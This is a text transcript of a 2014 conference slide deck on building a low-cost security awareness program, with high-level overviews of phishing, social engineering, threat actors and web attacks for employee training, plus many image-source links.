building an information security awareness program
DESCRIPTION
Most organization’s Security Awareness Programs suck. They involved ‘canned’ video presentations or someone is HR explaining computer use policies. Others are extremely expensive and beyond the reach of the budgets of smaller organizations. This talk will show you how to build a Security Awareness Program from scratch for little or no money, and how to engage your users so that they get the most out of the program.TRANSCRIPT
Building an Information Security Awareness ProgramBuilding an Information Security Awareness Program
Bill GardnerBill GardnerAssistant ProfessorAssistant Professor
Department of Integrated Science & TechnologyDepartment of Integrated Science & Technology
Digital Forensics and Information Assurance ProgramDigital Forensics and Information Assurance Program
Marshall UniversityMarshall University
Hack3rcon.org
appyide.org
hackersforcharity.org
Image Source: http://blog.rucker.ca/2009/02/youre-doing-it-wrong.html
Image Source: http://www.agilemodeling.com/artifacts/networkDiagram.htm
Copyright 2014 Bill Gardner and Frank Hackett
What is Security Awareness and Training
Why Security Awareness and Training?
Image Source: http://www.thewindowsclub.com/social-engineering-techniques
Getting Management Buy-in
Image Source: https://supportforums.cisco.com/blog/150946/building-strong-security-policies
Getting Management Buy-in
Image Source: https://www.chromeriver.com/postcards/
Getting Management Buy-in
Image Source: https://www.facebook.com/thesfglobe/photos/a.581802245240710.1073741828.578850155535919/601831693237765/?type=1&theater
Getting Management Buy-in
Image Source: http://www.european-coatings.com/Markets-Companies/CPS-Color-increases-colorant-production
Targeted
Image Source: http://theasggroup.com/2012/05/tools-for-salespeople/
Targeted
Image Source: http://www.processmakerblog.com/bpm-2/secrets-automating-department/
Targeted
Image Source: http://www.innovationmanagement.se/2011/05/19/how-to-foster-greater-collaboration-between-innovators-and-the-it-department/
How Often
Image Source: http://integrityhr.com/top-10-violations-investigated-by-the-dol-and-how-to-avoid-them/
How Often
Image Source: http://cheezburger.com/1904315136
How Often
Image Source: http://www.theproducersperspective.com/my_weblog/2012/11/broadways-2012-quarter-2-report.html/i_love_quarterly_reports_mug-p168055427806712929enw9p_400
How Often
Image Source: http://micronarratives.blogspot.com/2010/08/continual-improvement-cycle-quality.html
User Awareness Training Must Be Engaging
Image Source: http://jansimson.com/2011/10/29/omg-that-class-is-so-boring/
User Awareness Training Must Be Engaging
Image Source: https://www.pjrc.com/teensy/projects.html
User Awareness Training Must Be Engaging
Image Source: http://www.cedia.org/in-person-training
User Awareness Training Must Be Engaging
Image Source: https://www.facebook.com/efm.lk/photos/a.132867908531.105751.75172638531/10153169793713532/?type=1&theater
User Awareness Training Must Be Engaging
Image Source: http://pictures.4ever.eu/tag/23829/lot-of-money?pg=2
The First Step of User Awareness Training is Explaining Risk
Image Source: https://www.facebook.com/photo.php?fbid=1415938958687951&set=a.1384739928474521.1073741828.100008155802751&type=1&theater
Cost of A Data Breach
Image Source: https://www.facebook.com/photo.php?fbid=10152535939267845&set=a.130149082844.132252.90859152844&type=1&theater
Why Hack?
• Money – Identity Theft, Credit Card Theft• Industrial Espionage - Trade Secrets• Hacktivism• Cyber War• Bragging Rights
Image Source: https://nuestropensar.wordpress.com/2010/12/
Threats
• Russian Business Network• Chinese Hackers• Hacktivism• Cyberwar
Image Source: http://feministmormonhousewivespodcast.org/category/threats/
Russian Business Network
• Commonly abbreviated as RBN
• Multi-faceted cybercrime organization
• Specializes in personal identity theft for resale.
Image Source: http://jeffreycarr.blogspot.com/2013/01/rbn-connection-to-kasperskys-red.html
Chinese Hackers
• Hack for nationalistic reasons.
• Some appear to be state sponsored or a unofficial part of the Chinese Army.
• GhostNet• Google Hack• APT – Advanced
Persistent Threat
Hacktivism
"the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft..."
Image Source: http://www.anonymousartofrevolution.com/2013/08/hacktivism-self-defense-for.html
Cyberwar
• Cyberwarfare is used to refer to politically motivated hacking to conduct sabotage and espionage.
• Is state sponsored.• In the 2007 Russia waged
cyberwar against Estonia.Image Source: http://www.wired.com/2011/07/make-love-not-cyber-war/
Most Attacks Are Targeted
• Targeted threats are a class of malware destined for one specific organization or industry
• Targeted attacks may include threats delivered via e-mail, port attacks, zero day exploits or phishing messages.
Who is responsible for security?
Image Source: http://www.caltrate.co.za/everybody-needs-calcium
Image Source: https://blog.lookout.com/blog/2013/11/12/security-alert-adobe-password-breach/
Passwords
Locking Computers
Attachments
Be cautious of e-mail claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders.
Phishing
Social Engineering
• Not all security breaches are the result of technical attacks.
• In computer and network security people are the weakest link.
• As he outlines in this book “The Art of Deception”, convicted computer hacker Kevin Mitnick penetrated computer networks by tricking people into giving him passwords and other confidential information.
No Tech Hacking
• Dumpster Diving – Sometimes confidential document can be found in the trash.
• Tailgating – Following someone through a locked door.• Shoulder Surfing – Getting passwords or other
confidential information by looking over someone’s shoulder.
• Google Hacking – Finding passwords or other confidential information by using Google searches.
• P2P Hacking – Finding passwords or other confidential information on peer-to-peer networks.
No Tech Hacking
Insecure third-party software
• P2P file sharing – Some people share entire hard drive• Instant Messaging- IM is insecure because it was not designed with
security in mind
Adware
Adware or advertising-supported software is any software package which automatically plays, displays, or downloads advertisements to a computer after the software is installed or while the application is being used.
Spyware
Some types of adware are also spyware and can be classified as software that steals personal information when you enter it into legitimate programs or websites, or logs your keystrokes to steal your passwords or other personal information.
Web Attacks
• IFrame attacks• Cross site scripting• Doesn’t require the user to click on anything• Simply visiting the site will cause an infection
Two Examples of Web Attacks• WV State Bar website: http://www.wvbar.org/• The WV record: http://www.wvrecord.com/
Metadata Awareness
Redlining/Track Changes
Estimated Publish Date August 18th, 2014
Questions?
Contact Information
• Facebook : https://www.facebook.com/oncee• Twitter: @oncee• Linkedin: http://www.linkedin.com/in/304blogs